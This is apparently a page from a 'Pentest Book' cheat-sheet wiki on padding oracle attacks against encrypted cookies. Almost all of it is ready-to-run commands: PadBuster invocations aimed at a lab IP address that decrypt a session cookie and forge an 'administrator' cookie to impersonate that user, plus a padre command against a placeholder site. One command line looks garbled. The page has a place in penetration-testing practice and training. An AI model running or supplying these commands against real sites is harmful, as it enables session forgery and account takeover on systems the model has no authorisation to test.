Pentest Book
Search…
Cookie Padding
1
# https://github.com/AonCyberLabs/PadBuster
2
# Get cookie structure
3
padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
4
# Get cookie for other user (impersonation)
5
padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorhc0nwithyhackme'
6
7
#https://github.com/glebarez/padre
8
padre -u 'https://target.site/profile.php' -cookie 'SESS=#x27; 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='
9
10
# https://github.com/Kibouo/rustpad
11
Copied!
Last modified 3mo ago
Export as PDF
Copy link
Edit on GitHub